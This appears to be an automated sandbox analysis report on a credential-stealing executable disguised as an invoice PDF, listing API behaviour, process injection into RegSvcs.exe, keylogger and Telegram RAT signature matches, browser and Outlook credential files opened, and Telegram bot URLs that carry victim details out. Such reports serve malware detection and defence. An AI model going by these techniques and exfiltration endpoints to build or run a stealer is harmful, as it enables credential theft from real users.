Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

Code function: 0_2_00470B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00470B62

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_00442622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00442622
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0043083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0043083F
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_004309D5 SetUnhandledExceptionFilter,	0_2_004309D5
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_00430C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00430C21
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B22622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00B22622
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B1083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00B1083F
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B109D5 SetUnhandledExceptionFilter,	7_2_00B109D5
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B10C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00B10C21

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: D3B008			Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 3A7008			Jump to behavior

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

0_2_00471201

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

Code function: 0_2_00452BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00452BA5

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

Code function: 0_2_0047B226 SendInput,keybd_event,

0_2_0047B226

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

Code function: 0_2_004922DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_004922DA

Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Invoice No 1122207 pdf.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\supergroup\ageless.exe "C:\Users\user\AppData\Local\supergroup\ageless.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\supergroup\ageless.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

0_2_00470B62

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

Code function: 0_2_00471663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00471663

Source: Invoice No 1122207 pdf.exe, ageless.exe.0.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Invoice No 1122207 pdf.exe, ageless.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

Code function: 0_2_00430698 cpuid

0_2_00430698

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

Code function: 0_2_00488195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_00488195

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

Code function: 0_2_0046D27A GetUserNameW,

0_2_0046D27A

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

Code function: 0_2_0044B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_0044B952

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

Code function: 0_2_004142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004142DE

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000B.00000002.2526741820.0000000002481000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2527756944.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 10.2.ageless.exe.1600000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.ageless.exe.1580000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.ageless.exe.1600000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.ageless.exe.1580000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2524453250.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ageless.exe PID: 7660, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ageless.exe PID: 8028, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 8060, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 10.2.ageless.exe.1600000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.ageless.exe.1580000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.ageless.exe.1600000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.ageless.exe.1580000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2524453250.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ageless.exe PID: 7660, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ageless.exe PID: 8028, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: ageless.exe	Binary or memory string: WIN_81
Source: ageless.exe	Binary or memory string: WIN_XP
Source: ageless.exe.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: ageless.exe	Binary or memory string: WIN_XPe
Source: ageless.exe	Binary or memory string: WIN_VISTA
Source: ageless.exe	Binary or memory string: WIN_7
Source: ageless.exe	Binary or memory string: WIN_8

Source: Yara match	File source: 10.2.ageless.exe.1600000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.ageless.exe.1580000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.ageless.exe.1600000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.ageless.exe.1580000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2524453250.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2527756944.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ageless.exe PID: 7660, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ageless.exe PID: 8028, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 8060, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000B.00000002.2526741820.0000000002481000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2527756944.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 10.2.ageless.exe.1600000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.ageless.exe.1580000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.ageless.exe.1600000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.ageless.exe.1580000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2524453250.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ageless.exe PID: 7660, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ageless.exe PID: 8028, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 8060, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 10.2.ageless.exe.1600000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.ageless.exe.1580000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.ageless.exe.1600000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.ageless.exe.1580000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2524453250.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ageless.exe PID: 7660, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ageless.exe PID: 8028, type: MEMORYSTR

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_00491204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	0_2_00491204
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_00491806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00491806
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B71204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	7_2_00B71204
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B71806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	7_2_00B71806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	1 Native API	111 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	127 System Information Discovery	Distributed Component Object Model	21 Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	1 Masquerading	LSA Secrets	321 Security Software Discovery	SSH	3 Clipboard Data	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	2 Registry Run Keys / Startup Folder	2 Valid Accounts	Cached Domain Credentials	111 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	111 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Invoice No 1122207 pdf.exe	33%	Virustotal		Browse
Invoice No 1122207 pdf.exe	45%	ReversingLabs	Win32.Trojan.Generic
Invoice No 1122207 pdf.exe	100%	Avira	DR/AutoIt.Gen8
Invoice No 1122207 pdf.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\supergroup\ageless.exe	100%	Avira	DR/AutoIt.Gen8
C:\Users\user\AppData\Local\supergroup\ageless.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\supergroup\ageless.exe	45%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label	Link
http://us2.smtp.mailhostbox.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
us2.smtp.mailhostbox.com	208.91.199.223	true	false	high
reallyfreegeoip.org	104.21.112.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	158.101.44.242	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:284992%0D%0ADate%20and%20Time:%2015/01/2025%20/%2012:22:00%0D%0ACountry%20Name:%20%0D%0A%5B%20284992%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:284992%0D%0ADate%20and%20Time:%2015/01/2025%20/%2012:01:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20284992%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
http://checkip.dyndns.org/	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	RegSvcs.exe, 0000000B.00000002.2526741820.0000000002648000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	RegSvcs.exe, 0000000B.00000002.2529344457.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	RegSvcs.exe, 0000000B.00000002.2529344457.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	RegSvcs.exe, 00000008.00000002.2527756944.00000000030A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002543000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	RegSvcs.exe, 0000000B.00000002.2529344457.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	ageless.exe, 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2527756944.00000000030A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2524453250.0000000000402000.00000040.80000000.00040000.00000000.sdmp, ageless.exe, 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002543000.00000004.00000800.00020000.00000000.sdmp	false		high
http://us2.smtp.mailhostbox.com	RegSvcs.exe, 00000008.00000002.2527756944.0000000003104000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2527756944.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.00000000025D4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.office.com/P	RegSvcs.exe, 0000000B.00000002.2526741820.0000000002639000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/lB	RegSvcs.exe, 00000008.00000002.2527756944.00000000031A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002643000.00000004.00000800.00020000.00000000.sdmp	false		high
